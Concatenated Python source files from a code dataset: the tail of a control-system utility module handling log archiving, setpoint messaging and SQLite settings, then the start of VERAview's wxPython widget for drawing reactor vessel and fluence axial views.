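#   app_check_keywords({'log_name': 'syslog'}, ['log_name', 'archived_log_name'], output)
# returns False and notes the missing 'archived_log_name' in output['message'].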
def copy_log_to_archive(log_name, **kwargs):
settings = {
'archive_name': None,
'force_extension': True,
'extension':'.db',
'directory': dirs.archive
}
settings.update(kwargs)
from iiutilities.datalib import gettimestring
if not settings['archive_name']:
settings['archive_name'] = log_name + gettimestring() + '.db'
if settings['force_extension'] and not settings['archive_name'].endswith(settings['extension']):
settings['archive_name'] += settings['extension']
# Determine type by log name
from iiutilities.datalib import gettimestring
archive_db = dblib.sqliteDatabase(settings['directory'] + settings['archive_name'])
logs_db = dblib.sqliteDatabase(dirs.dbs.log)
existing_table = logs_db.read_table(log_name)
existing_schema = logs_db.get_schema(log_name)
archive_db.create_table('data', existing_schema, queue=True)
archive_db.insert('data', existing_table, queue=True)
archive_db.create_table('info', schema.data_items, queue=True)
archive_db.insert('info', {'valuename': 'created', 'value': gettimestring()}, queue=True)
archive_db.insert('info', {'valuename': 'name', 'value': log_name}, queue=True)
archive_db.execute_queue()
def rotate_all_logs(**kwargs):
# These defaults come from globals above
settings = {
'logs_to_keep':numlogs,
'max_log_size':maxlogsize,
'debug':False
}
settings.update(**kwargs)
from iiutilities.utility import rotate_log_by_size
for attr, value in dirs.logs.__dict__.items():
if settings['debug']:
print('Rotating {}'.format(attr))
rotate_log_by_size(value, settings['logs_to_keep'], settings['max_log_size'])
def app_copy_log_to_archive(d,output):
required_keywords = ['log_name', 'archived_log_name']
if not app_check_keywords(d,required_keywords,output):
return
copy_log_to_archive(d['log_name'], archive_name=d['archived_log_name'])
# this is an auxiliary function that will carry out additional actions depending on
# table values. For example, setting a 'pending' value when modifying setpoints
def setsinglecontrolvalue(database, table, valuename, value, condition=None):
from iiutilities.datalib import gettimestring
from iiutilities import dblib
from iiutilities import utility
if table == 'channels':
utility.log(dirs.logs.control, "Table: " + table + " found in keywords", 4, loglevels.control)
if valuename in ['setpointvalue']:
utility.log(dirs.logs.control, "Set value: " + valuename + " found in keywords", 4, loglevels.control)
# Get the channel data
try:
channeldata = dblib.readonedbrow(dirs.dbs.control, 'channels', condition=condition)[0]
except:
utility.log(dirs.logs.control, "error retrieving channel with condition " + condition, 1, loglevels.control)
else:
utility.log(dirs.logs.control, "Channel retrieval went ok with " + condition, 1, loglevels.control)
"""
This all needs to go into the picontrol section
Set a pending value in modify channel, then picontrol processes pending setpoint
"""
if channeldata['type'] == 'remote' and channeldata['enabled']:
# Process setpointvalue send for remote here to make it as fast as possible.
# First we need to identify the node and channel by retrieving the interface
channelname = channeldata['name']
utility.log(dirs.logs.control, "Processing remote setpoint for channel " + channelname, 1, loglevels.io)
# Then go to the interfaces table to get the node and channel addresses
address = dblib.getsinglevalue(dirs.dbs.control, 'interfaces', 'address', condition ="name='" + channelname + "'")
utility.log(dirs.logs.control, "Channel has address " + address, 1, loglevels.io)
node = address.split(':')[0]
channel = address.split(':')[1]
# If it's local, we send the command to the controller directly
if int(node) == 1:
message = '~setsv;' + channel + ';' + str(value)
# If not, first insert the sendmsg command to send it to the remote node
else:
message = '~sendmsg;' + node + ';;~setsv;' + channel + ';' + str(value)
utility.log(dirs.logs.control, "Sending message: " + message, 1, loglevels.io)
# Then queue up the message for dispatch
dblib.sqliteinsertsingle(dirs.dbs.motes, 'queued', [gettimestring(), message])
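# Message format sketch (channel and value are example numbers): a local
# controller receives '~setsv;2;72.5', while a remote node, e.g. node 3,
# receives the wrapped form '~sendmsg;3;;~setsv;2;72.5'.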
# get existing pending entry
pendingvaluelist = []
pendingentry = dblib.getsinglevalue(database, table, 'pending', condition=condition)
if pendingentry:
try:
pendingvaluelist = pendingentry.split(',')
except:
pendingvaluelist = []
if valuename in pendingvaluelist:
pass
else:
pendingvaluelist.append(valuename)
pendinglistentry = ','.join(pendingvaluelist)
dblib.setsinglevalue(database, table, 'pending', pendinglistentry, condition)
else:
utility.log(dirs.logs.control, "Set value: " + valuename + " not found in keywords", 4, loglevels.control)
# carry out original query no matter what
response = dblib.setsinglevalue(database, table, valuename, value, condition)
return response
def set_all_wal(wal=True):
db_paths = [
dirs.dbs.control,
dirs.dbs.log,
dirs.dbs.session,
dirs.dbs.recipe,
dirs.dbs.system,
dirs.dbs.motes,
dirs.dbs.info,
dirs.dbs.auths,
dirs.dbs.notifications,
dirs.dbs.safe,
dirs.dbs.users
]
for db_path in db_paths:
database = cupidDatabase(db_path)
database.set_wal_mode(wal)
def reload_log_config(**kwargs):
settings = {'quiet':False}
settings.update(kwargs)
logconfig_query_result = dbs.system.read_table_row('logconfig')[0]
logconfigdata = logconfig_query_result
loglevels.network = logconfigdata['network']
loglevels.io = logconfigdata['io']
loglevels.system = logconfigdata['system']
loglevels.control = logconfigdata['control']
loglevels.daemon = logconfigdata['daemon']
loglevels.serial = logconfigdata['serial']
loglevels.notifications = logconfigdata['notifications']
return logconfigdata
def set_debug():
print('** ENABLING DEBUG MODE **')
for attr, value in loglevels.__dict__.items():
setattr(loglevels, attr, 9)
for db_name in dirs.dbs.__dict__:
setattr(dbs, db_name, cupidDatabase(getattr(dirs.dbs, db_name), quiet=False))
# On import, Attempt to update from database. If we are unsuccessful, the above are defaults
try:
logconfig = reload_log_config(quiet=True)
except:
pass
else:
for key in logconfig:
try:
setattr(loglevels, key, logconfig[key])
except:
print ('Set attribute for "' + key + '" did not work')
def getdatameta(database, **kwargs):
settings = {
'get_time_span':True
}
settings.update(kwargs)
tablenames = dblib.gettablenames(database)
if 'metadata' in tablenames:
tablenames.remove('metadata')
queryarray = []
for tablename in tablenames:
queryarray.append("select count(*) from '" + tablename + "'")
results = dblib.sqlitemultquery(database, queryarray, **kwargs)['data']
meta = []
for result, tablename in zip(results, tablenames):
this_meta = {}
this_meta['tablename'] = tablename
this_meta['numpoints'] = result[0][0]
# Quick hacky way to know if this is an archive log or not
if tablename == 'data':
from os.path import split
db_name = split(database)[1]
types = table_name_to_type(db_name)
else:
types = table_name_to_type(tablename)
this_meta['type'] = types['type']
this_meta['subtype'] = types['subtype']
this_meta['id'] = types['id']
if settings['get_time_span']:
timespan = dblib.gettimespan(database, tablename)['seconds']
this_meta['timespan'] = timespan
meta.append(this_meta)
return meta
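# Each entry returned above is a dict with keys 'tablename', 'numpoints',
# 'type', 'subtype' and 'id' (the last three as returned by
# table_name_to_type()), plus 'timespan' in seconds when get_time_span is set,
# e.g. (illustrative): {'tablename': 'channel1', 'numpoints': 1440, ...}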
def get_and_set_logdb_metadata(database, **kwargs):
meta = getdatameta(database, **kwargs)
the_db = dblib.sqliteDatabase(database)
the_schema = dblib.sqliteTableSchema([
{'name':'tablename','primary':True},
{'name':'numpoints','type':'integer'},
{'name':'timespan','type':'real'},
{'name':'type'},
{'name':'subtype'},
{'name':'id'}
])
the_db.create_table('metadata', the_schema, dropexisting=True, queue=True)
for meta_item in meta:
the_db.insert('metadata', {'tablename':meta_item['tablename'], 'numpoints':meta_item['numpoints'],
'timespan':meta_item['timespan'], 'type':meta_item['type'],
'subtype':meta_item['subtype'], 'id':meta_item['id']}, queue=True)
the_db.execute_queue()
 | 35.033806 | 182 | 0.61209

4a1f3fab0e0526b26e43b95b32bb7593ad9018b7 | 81,434 | py | Python | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [ "BSD-3-Clause" ] | 7 | 2017-04-21T05:35:16.000Z | 2022-02-28T20:14:42.000Z | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [ "BSD-3-Clause" ] | 2 | 2019-02-27T15:25:34.000Z | 2021-05-26T17:01:59.000Z | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [ "BSD-3-Clause" ] | 3 | 2019-07-09T08:31:34.000Z | 2022-03-08T03:18:48.000Z |

#!/usr/bin/env python
# $Id$
#------------------------------------------------------------------------
# NAME: vessel_core_axial_view.py -
# HISTORY: -
# 2019-01-18 [email protected] -
# Transition from tally to fluence.
# 2018-03-02 [email protected] -
# Migrating to _CreateEmptyBitmapAndDC().
# 2018-02-06 [email protected] -
# Fixing scaling issues.
# 2018-02-05 [email protected] -
# Moving Linux/GTK/X11 image manipulation to the UI thread.
# 2018-02-03 [email protected] -
# Starting in middle of assembly for quarter symmetry.
# 2018-01-09 [email protected] -
# Implementing core slice along azimuth.
# 2017-11-17 [email protected] -
# Migrating to wx.Bitmap instead of PIL.Image.
# 2017-09-22 [email protected] -
# Added theta_rad to the drawing state tuple.
# 2017-09-18 [email protected] -
# Fixed baffle draw in _DrawVesselComponents().
# Limited axial vessel vertical display to axialCoreDy (pixels).
# 2017-09-14 [email protected] -
# In LoadProps() converting tallyAddr[0] from a dict to a
# DataSetName instance.
# 2017-09-11 [email protected] -
#------------------------------------------------------------------------
import logging, math, os, sys, threading, time, timeit, traceback
import numpy as np
import pdb #pdb.set_trace()
try:
import wx
import wx.lib.delayedresult as wxlibdr
#from wx.lib.scrolledpanel import ScrolledPanel
except Exception:
raise ImportError( 'The wxPython module is required for this component' )
#try:
# import PIL.Image, PIL.ImageDraw, PIL.ImageFont
# #from PIL import Image, ImageDraw
#except Exception:
# raise ImportError, 'The Python Imaging Library (PIL) is required for this component'
from data.datamodel import *
from data.utils import *
from event.state import *
from .raster_widget import *
from .widget import *
_DEBUG_ = False
#PI_OVER_2 = math.pi / 2.0
#TWO_PI = math.pi * 2.0
#------------------------------------------------------------------------
# CLASS: VesselCoreAxial2DView -
#------------------------------------------------------------------------
class VesselCoreAxial2DView( RasterWidget ):
"""Pin-by-pin assembly view across axials and states.
21.6 * 8 = 172.8
vessel mod 187.96 ! barrel IR (cm)
ss 193.68 ! barrel OR (cm)
mod 219.15 ! vessel liner IR (cm)
ss 219.71 ! vessel liner OR / vessel IR (cm)
cs 241.70 ! vessel OR (cm)
pad ss 194.64 201.63 32 45 135 225 315 ! neutron pad ID,OD arc length
(degrees), and angular positions (degrees)
Properties:
"""
# -- Object Methods
# --
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.__init__() -
#----------------------------------------------------------------------
def __init__( self, container, id = -1, **kwargs ):
"""
"""
self.angleSlider = None
self.assemblyAddr = ( -1, -1, -1 )
self.auxNodeAddrs = []
self.channelMode = False
self.fluenceAddr = FluenceAddress( radiusIndex = 0, thetaIndex = 0 )
self.nodalMode = False
self.nodeAddr = -1
self.subAddr = ( -1, -1 )
#self.vesselShowPad = True
# offsets in cm to edge given current cellRange
self.vesselOffset = [ 0, 0 ]
super( VesselCoreAxial2DView, self ).__init__( container, id )
#end __init__
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateAdditionalUIControls() -
#----------------------------------------------------------------------
def _CreateAdditionalUIControls( self ):
"""Creates a 'top' slider for selecting the view angle.
@return { 'top': panel }
"""
panel = wx.Panel( self )
label = wx.StaticText( panel, -1, 'Angle: ' )
self.angleSlider = wx.Slider(
panel, -1,
value = 0, minValue = 0, maxValue = 89,
pos = wx.DefaultPosition, size = ( -1, -1 ),
style = wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS
)
self.angleSlider.SetPageSize( 1 )
self.angleSlider.Bind( wx.EVT_SCROLL, self._OnAngleSlider )
sizer = wx.BoxSizer( wx.HORIZONTAL )
sizer.Add( label, 0, wx.ALL | wx.ALIGN_LEFT | wx.ALIGN_CENTER )
sizer.Add( self.angleSlider, 1, wx.ALL | wx.EXPAND, 4 )
panel.SetSizer( sizer )
return { 'top': panel }
#end _CreateAdditionalUIControls
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardData() -
#----------------------------------------------------------------------
def _CreateClipboardData( self, mode = 'displayed' ):
"""Retrieves the data for the state and axial.
@return text or None
"""
return \
self._CreateClipboardDisplayedData() if mode == 'displayed' else \
self._CreateClipboardSelectedData()
# self._CreateClipboardSelectionData() \
# if cur_selection_flag else \
# self._CreateClipboardAllData()
#end _CreateClipboardData
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardDisplayedData() -
#----------------------------------------------------------------------
def _CreateClipboardDisplayedData( self ):
"""Retrieves the data for the state and axial.
@return text or None
"""
csv_text = None
core = self.dmgr.core
dset = None
theta_ndx = self.fluenceAddr.thetaIndex
if theta_ndx >= 0:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
theta_ndx = min( theta_ndx, core.fluenceMesh.ntheta - 1 )
if dset is not None:
dset_array = np.array( dset )
ax_ranges = self._GetAxialRanges( 'fluence' )
r_start_ndx = self.config[ 'radiusStartIndex' ]
csv_text = '"%s: theta=%.3f; %s=%.3g"\n' % (
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
core.fluenceMesh.theta[ theta_ndx ],
self.state.timeDataSet,
self.timeValue
)
csv_text += 'z,r,value\n'
#for ax in xrange( len( core.tally.z ) - 1, -1, -1 ):
for ax in xrange(
ax_ranges.get( 'fluence_top_ndx' ) - 1,
ax_ranges.get( 'fluence_bottom_ndx' ) - 1,
-1
):
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
value = dset_array[ ax, theta_ndx, ri ]
row = '%.3f,%.3f,%.7g\n' % \
( core.fluenceMesh.z[ ax ], core.fluenceMesh.r[ ri ], value )
csv_text += row
#end for ri
#end for ax
#end if dset is not None and core is not None
return csv_text
#end _CreateClipboardDisplayedData
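# The copied text looks like the following (dataset name and values are
# illustrative):
#   "fluence: theta=0.131; exposure=1.5"
#   z,r,value
#   11.951,187.960,1.234568e+19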
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardSelectedData() -
#----------------------------------------------------------------------
def _CreateClipboardSelectedData( self ):
"""Retrieves the data for the state, axial, and assembly.
@return text or None
"""
csv_text = None
core = self.dmgr.core
dset = None
theta_ndx = self.fluenceAddr.thetaIndex
z_ndx = self.axialValue.fluenceIndex
if z_ndx >= 0 and theta_ndx >= 0:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
core = self.dmgr.GetCore()
theta_ndx = min( theta_ndx, core.fluenceMesh.ntheta - 1 )
#z_ndx = min( z_ndx, core.fluenceMesh.nz - 1 )
z_ndx = min( z_ndx, core.fluenceMesh.nz - 2 )
if dset is not None and z_ndx >= 0:
dset_array = np.array( dset )
r_start_ndx = self.config[ 'radiusStartIndex' ]
csv_text = '"%s: axial=%.3f, theta=%.3f; %s=%.3g"\n' % (
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
#self.axialValue.cm,
core.fluenceMesh.zcenters[ z_ndx ],
core.fluenceMesh.GetThetaRads( theta_ndx ),
self.state.timeDataSet,
self.timeValue
)
csv_text += 'r,value\n'
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
value = dset_array[ z_ndx, theta_ndx, ri ]
row = '%.3f,%.7g\n' % ( core.fluenceMesh.r[ ri ], value )
csv_text += row
#end for ri
#end if dset is not None and core is not None
return csv_text
#end _CreateClipboardSelectedData
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateDrawConfig() -
#----------------------------------------------------------------------
def _CreateDrawConfig( self, **kwargs ):
"""Creates a draw configuration based on imposed 'size' (wd, ht ).
The technique is to determine the number of pixels per pin, with a minimum
of 1, meaning a forced scale might be necessary.
Keyword Args:
scale_type (str): 'linear' or 'log', defaulting to 'linear'
size (tuple(int)): ( wd, ht) against which to calculate the scale
fluence_scale_type (str): 'linear' or 'log', defaulting to 'linear'
Returns:
dict: keys (inherited from RasterWidget)
clientSize (tuple(int)): wd, ht
dataRange (tuple(float)):
( range_min, range_max, data_min, data_max )
font (wx.Font):
fontSize (int): font point size
labelFont (wx.Font):
labelSize (tuple(int)): wd, ht
legendBitmap (wx.Bitmap):
legendSize (tuple(int)): wd, ht
mapper (matplotlib.cm.ScalarMappable): used to convert values to
colors
valueFont (wx.Font):
(created here)
assemblyWidth (int): pixels required to draw an assembly
coreAxialDy (int): total of pixel offsets in y dimension for
core datasets
coreAxialLevelsDy (list(int)): list of pixel offsets in y dimension
for core datasets
coreAxialOffsetPix (int): vertical pixels for the core offset
coreRegion (list(int)): x, y, wd, ht
imageSize (tuple(int)): wd, ht
lineWidth (int): hilite line pixel width
npin (int): effective number of pins per assy for drawing
npinxCosTheta (float): effective (cos theta) pin columns per assy
npinySinTheta (float): effective (sin theta) pin rows per assy
pinCm (float): centimeters per pin
pinWidth (int): pixels to draw a pin
pixPerCm (float): non-integral pixels per centimeter
thetaCos (float): theta cosine
thetaRad (float): theta in radians
thetaSin (float): theta sine
valueFontSize (int): point size
vesselRegion (list(int)): x, y, wd, ht
(if fluence)
baffleWidth (int): pixel width for drawing the baffle
barrelRadius (int): pixel at which the baffle starts on the
top horizontal line
barrelWidth (int): pixel width for drawing the barrel
coreOffsetCm (float): offset to the start of the core in cm
fluenceDataRange (tuple(float)):
( range_min, range_max, data_min, data_max )
fluenceDataSetExpr (str): expression to apply when pulling data
based on a threshold
fluenceLegendBitmap (wx.Bitmap):
fluenceLegendSize (tuple(int)): wd, ht
fluenceMapper (matplotlib.cm.ScalarMappable): used to convert
values to colors
fluenceAxialDy (int): total of pixel offsets in y dimension for
fluence datasets
fluenceAxialLevelsDy (list(int)): list of pixel offsets in y
dimension for fluence datasets
fluenceAxialOffsetPix (int): vertical pixels for the vessel offset,
should be 0
linerRadius (int): pixel at which the liner starts on the
top horizontal line
linerWidth (int): pixel width for drawing the liner
padAngles (list(float)): pad start angles in degrees
padArc (float): pad arc in degrees
padRadius (int): pixel at which the pad would start on the
top horizontal line
padWidth (int): pixel width for drawing the pad
radiusStartIndex (int): 0-based index in the radius array at which
to start drawing
thetaStopIndex (int): 0-based exclusive index
vesselRadius (int): pixel at which the vessel ends on the
top horizontal line
"""
ds_range = self._ResolveDataRange(
self.curDataSet,
self.timeValue if self.state.scaleMode == 'state' else -1,
apply_custom_range = False
)
kwargs[ 'colormap_name' ] = 'jet'
if 'scale_type' not in kwargs:
kwargs[ 'scale_type' ] = self.dmgr.GetDataSetScaleType( self.curDataSet )
config = self._CreateBaseDrawConfig( ds_range, **kwargs )
core = self.dmgr.GetCore()
font_size = config[ 'fontSize' ]
label_size = config[ 'labelSize' ]
#legend_bmap = config[ 'legendBitmap' ]
legend_size = config[ 'legendSize' ]
# -- Calc axial_mesh range and cm/pin
# --
#axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet )
#top_mesh_level = min( self.cellRange[ 3 ] - 1, len( axial_mesh ) - 1 )
#could never happen
#if top_mesh_level == self.cellRange[ 1 ]:
# axial_range_cm = axial_mesh[ -1 ] - axial_mesh[ 0 ]
# Note, if we ever allow zooming, we must call _GetAxialRanges() to
# account for cellRange, so we might as well do it now
ax_ranges = self._GetAxialRanges( 'core', 'fluence' )
axial_mesh = self.dmgr.GetAxialMesh2( mesh_type = 'all' )
axial_range_cm = ax_ranges[ 'cm_top' ] - ax_ranges[ 'cm_bottom' ]
if axial_range_cm == 0.0:
axial_range_cm = 1.0
# -- Core axial offset
core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
core_axial_offset_cm = axial_mesh[ -1 ] - core_axial_mesh[ -1 ]
core_axial_range_cm = \
core_axial_mesh[ ax_ranges[ 'core_top_ndx' ] ] - \
core_axial_mesh[ ax_ranges[ 'core_bottom_ndx' ] ]
fluence_axial_offset_cm = 0.0
fluence_axial_range_cm = 1.0
# -- Calc values based on theta
vessel_geom = core.vesselGeom
fluence_mesh = core.fluenceMesh
theta_rad = fluence_mesh.GetThetaRads( self.fluenceAddr.thetaIndex )
theta_cos = math.cos( theta_rad )
theta_sin = math.sin( theta_rad )
npinx_cos_theta = theta_cos * core.npinx
npiny_sin_theta = theta_sin * core.npiny
#npin = core.npin
npin = max( core.npinx, core.npiny )
if self.channelMode:
npin += 1
cm_per_pin = core.apitch / npin
# -- Calc axial pin equivalents
axial_pin_equivs = axial_range_cm / cm_per_pin
horz_pin_equivs = npin
core_aspect_ratio = core.apitch * self.cellRange[ -2 ] / axial_range_cm
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'theta_rad=%f, npin=%d, apitch=%f, ' +
'cm_per_pin=%f, axial_pin_equivs=%f',
theta_rad, npin, core.apitch, cm_per_pin, axial_pin_equivs
)
# -- Vessel stuff
# --
radius_start_ndx = 1
fluence_ds_expr = fluence_ds_range = fluence_legend_bmap = None
fluence_legend_size = ( 0, 0 )
theta_stop_ndx = fluence_mesh.ntheta
core_offset_cm = 0.0
vessel_wd_cm = core_wd_cm = self.cellRange[ -2 ] * core.apitch
if vessel_geom is not None and fluence_mesh.IsValid() and \
self.fluenceAddr.dataSetName is not None:
fluence_axial_mesh = \
self.dmgr.GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
fluence_axial_offset_cm = axial_mesh[ -1 ] - fluence_axial_mesh[ -1 ]
fluence_axial_range_cm = \
fluence_axial_mesh[ ax_ranges[ 'fluence_top_ndx' ] ] - \
fluence_axial_mesh[ ax_ranges[ 'fluence_bottom_ndx' ] ]
# rndx = DataUtils.FindListIndex( fluence_mesh.r, vessel_geom.linerOuter )
# if rndx > 1:
# radius_start_ndx = min( rndx, fluence_mesh.nr - 1 )
radius_start_ndx = fluence_mesh.FindRadiusStartIndex( vessel_geom )
# if core.coreSym == 4:
# tndx = DataUtils.FindListIndex( fluence_mesh.theta, PI_OVER_2 )
# if fluence_mesh.theta[ tndx ] == PI_OVER_2:
# tndx -= 1
# theta_stop_ndx = min( tndx + 1, fluence_mesh.ntheta )
theta_stop_ndx = fluence_mesh.FindThetaStopIndex( core.coreSym )
fluence_ds_expr = '[:,:%d,%d:]' % ( theta_stop_ndx, radius_start_ndx )
fluence_ds_range = self._ResolveDataRange(
self.fluenceAddr.dataSetName,
self.timeValue if self.state.scaleMode == 'state' else -1,
ds_expr = fluence_ds_expr
)
if 'fluence_scale_type' in kwargs:
fluence_scale_type = kwargs[ 'fluence_scale_type' ]
else:
fluence_scale_type = \
self._ResolveScaleType( self.fluenceAddr.dataSetName )
if fluence_scale_type == 'log':
fluence_ds_range = self.dmgr.NormalizeLogRange( fluence_ds_range )
norm = colors.LogNorm(
vmin = fluence_ds_range[ 0 ], vmax = fluence_ds_range[ 1 ],
clip = True
)
else:
norm = colors.Normalize(
vmin = fluence_ds_range[ 0 ], vmax = fluence_ds_range[ 1 ],
clip = True
)
fluence_mapper = cm.ScalarMappable(
norm = norm,
cmap = cm.get_cmap( self.colormapName )
)
if self.showLegend:
fluence_ds_name = \
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName )
ndx = fluence_ds_name.find( '/' )
if ndx >= 0:
fluence_ds_name = fluence_ds_name[ ndx + 1 : ]
fluence_legend_bmap = self._CreateLegendBitmap(
fluence_ds_range,
font_size = font_size,
mapper = fluence_mapper,
ntick_values = 8,
scale_type = fluence_scale_type,
title = fluence_ds_name
)
fluence_legend_size = \
( fluence_legend_bmap.GetWidth(), fluence_legend_bmap.GetHeight() )
#end if self.showLegend
if core.coreSym == 4 and max( core.nassx, core.nassy ) % 2 == 1:
core_offset_cm = 0.5 * core.apitch
vessel_wd_cm = max(
core_offset_cm + core_wd_cm + vessel_geom.vesselOuterOffset,
fluence_mesh.r[ -1 ]
)
horz_pin_equivs = vessel_wd_cm / cm_per_pin
#end if vessel_geom and fluence_mesh
# -- Scale to widget size?
# --
if 'clientSize' in config:
wd, ht = config[ 'clientSize' ]
# -- Determine drawable region
# --
# l2r label : core : (baffle 1 px) : font-sp : legend : fluence_legend
# t2b label : core : (baffle 1 px) : font-sp : title
#xxxxx revisit font_size, pt bigger than a pixel
region_wd = \
wd - label_size[ 0 ] - 2 - (font_size << 1) - \
legend_size[ 0 ] - fluence_legend_size[ 0 ]
working_ht = max( ht, legend_size[ 1 ], fluence_legend_size[ 1 ] )
region_ht = working_ht - label_size[ 1 ] - 2 - (font_size << 1)
region_aspect_ratio = float( region_wd ) / float( region_ht )
# -- Limited by height
#x if region_aspect_ratio > core_aspect_ratio:
#y if self.fitMode == 'ht':
#y pin_wd = max( 1, int( math.floor( region_ht / axial_pin_equivs ) ) )
#y pin_wd = min( 10, pin_wd )
# -- Limited by width
#y else:
#y pin_wd = max( 1, int( math.floor( region_wd / horz_pin_equivs ) ) )
pix_per_cm_x = float( region_wd ) / vessel_wd_cm
pix_per_cm_y = float( region_ht ) / axial_range_cm
if self.fitMode == 'ht':
pix_per_pin = math.floor( pix_per_cm_y * cm_per_pin )
#pix_per_pin = math.floor( min( pix_per_cm_x, pix_per_cm_y ) * cm_per_pin )
else:
pix_per_pin = math.floor( pix_per_cm_x * cm_per_pin )
#pix_per_pin = math.ceil( min( pix_per_cm_x, pix_per_cm_y ) * cm_per_pin )
pin_wd = pix_per_pin = min( 10, max( 1, int( pix_per_pin ) ) )
else: #deprecated
pin_wd = pix_per_pin = \
int( kwargs[ 'scale' ] ) if 'scale' in kwargs else 4
#font_size = self._CalcFontSize( 1024 * pix_per_pin )
# -- Pixels per cm, assembly width, core and vessel size
# --
pix_per_cm = pix_per_pin / cm_per_pin
assy_wd = npin * pix_per_pin
#x core_wd is cm_per_pin * self.cellRange[ -2 ] * npin * pix_per_cm_x
core_wd = self.cellRange[ -2 ] * assy_wd
core_ht = int( math.ceil( core_axial_range_cm * pix_per_cm ) )
#int( math.ceil( pix_per_cm * (axial_range_cm - core_axial_offset_cm) ) )
vessel_wd = int( math.ceil( pix_per_cm * vessel_wd_cm ) )
vessel_ht = int( math.ceil( pix_per_cm * fluence_axial_range_cm ) )
core_axial_offset_pix = \
0 if core_axial_offset_cm == 0.0 else \
int( math.floor( core_axial_offset_cm * pix_per_cm ) )
fluence_axial_offset_pix = \
0 if fluence_axial_offset_cm == 0.0 else \
int( math.floor( fluence_axial_offset_cm * pix_per_cm ) )
# -- Calc image size
# --
region_x = label_size[ 0 ] + 2
region_y = label_size[ 1 ] + 2
image_wd = \
region_x + vessel_wd + (font_size << 1) + \
legend_size[ 0 ] + fluence_legend_size[ 0 ]
image_ht = \
max( region_y + vessel_ht, legend_size[ 1 ], fluence_legend_size[ 1 ] ) + \
(font_size << 2)
# -- Create list of axial levels
# --
core_axials_dy = []
#for ax in range( self.cellRange[ 3 ] - 1, self.cellRange[ 1 ] - 1, -1 ):
for ax in xrange(
ax_ranges[ 'core_top_ndx' ] - 1, ax_ranges[ 'core_bottom_ndx' ] - 1, -1
):
ax_cm = core_axial_mesh[ ax + 1 ] - core_axial_mesh[ ax ]
dy = int( math.floor( pix_per_cm * ax_cm ) )
core_axials_dy.insert( 0, dy )
#end for ax
core_axial_dy = sum( core_axials_dy )
fluence_axial_dy = 0
fluence_axials_dy = []
if fluence_ds_range is not None:
for ax in range(
ax_ranges[ 'fluence_top_ndx' ] - 1,
ax_ranges[ 'fluence_bottom_ndx' ] - 1,
-1
):
ax_cm = fluence_axial_mesh[ ax + 1 ] - fluence_axial_mesh[ ax ]
dy = int( math.floor( pix_per_cm * ax_cm ) )
fluence_axials_dy.insert( 0, dy )
fluence_axial_dy = sum( fluence_axials_dy )
# -- Create config dict
# --
config[ 'assemblyWidth' ] = assy_wd
config[ 'coreAxialDy' ] = core_axial_dy
config[ 'coreAxialLevelsDy' ] = core_axials_dy
config[ 'coreAxialOffsetPix' ] = core_axial_offset_pix
config[ 'coreRegion' ] = [
region_x, region_y + core_axial_offset_pix,
core_wd, core_ht
]
#[ label_size[ 0 ] + 2, label_size[ 1 ] + 2, core_wd, core_ht ]
config[ 'imageSize' ] = ( image_wd, image_ht )
config[ 'lineWidth' ] = \
max( 1, min( int( assy_wd / 20.0 ), max( core_axials_dy ) >> 1, 5 ) )
#max( 1, min( 5, int( assy_wd / 20.0 ) ) )
config[ 'npin' ] = npin
config[ 'npinxCosTheta' ] = npinx_cos_theta
config[ 'npinySinTheta' ] = npiny_sin_theta
config[ 'pinCm' ] = cm_per_pin
config[ 'pinWidth' ] = pin_wd
config[ 'pixPerCm' ] = pix_per_cm
config[ 'thetaCos' ] = theta_cos
config[ 'thetaRad' ] = theta_rad
config[ 'thetaSin' ] = theta_sin
config[ 'valueFontSize' ] = assy_wd >> 1
config[ 'vesselRegion' ] = [ region_x, region_y, vessel_wd, vessel_ht ]
if self.nodalMode:
config[ 'nodeWidth' ] = assy_wd >> 1
if fluence_ds_range is not None:
baffle_wd = \
max( 1, int( math.ceil( vessel_geom.baffleSize * pix_per_cm ) ) )
barrel_r = int( math.ceil( vessel_geom.barrelInner * pix_per_cm ) )
barrel_wd = max( 1, int( vessel_geom.barrelSize * pix_per_cm ) )
liner_r = int( math.ceil( vessel_geom.linerInner * pix_per_cm ) )
liner_wd = max( 1, int( vessel_geom.linerSize * pix_per_cm ) )
pad_r = int( math.ceil( vessel_geom.padInner * pix_per_cm ) )
pad_wd = \
0 if vessel_geom.padSize <= 0 else \
max( 1, int( vessel_geom.padSize * pix_per_cm ) )
vessel_r = int( math.ceil( vessel_geom.vesselOuter * pix_per_cm ) )
config[ 'baffleWidth' ] = baffle_wd
config[ 'barrelRadius' ] = barrel_r
config[ 'barrelWidth' ] = barrel_wd
config[ 'coreOffsetCm' ] = core_offset_cm
config[ 'linerRadius' ] = liner_r
config[ 'linerWidth' ] = liner_wd
config[ 'padAngles' ] = vessel_geom.padAngles # DEF_pad_angles_deg
config[ 'padArc' ] = vessel_geom.padArc # DEF_pad_len_deg
config[ 'padRadius' ] = pad_r
config[ 'padWidth' ] = pad_wd
# We're suspending this with the new fluence data
config[ 'radiusStartIndex' ] = radius_start_ndx
# config[ 'radiusStartIndex' ] = 0
config[ 'fluenceAxialDy' ] = fluence_axial_dy
config[ 'fluenceAxialLevelsDy' ] = fluence_axials_dy
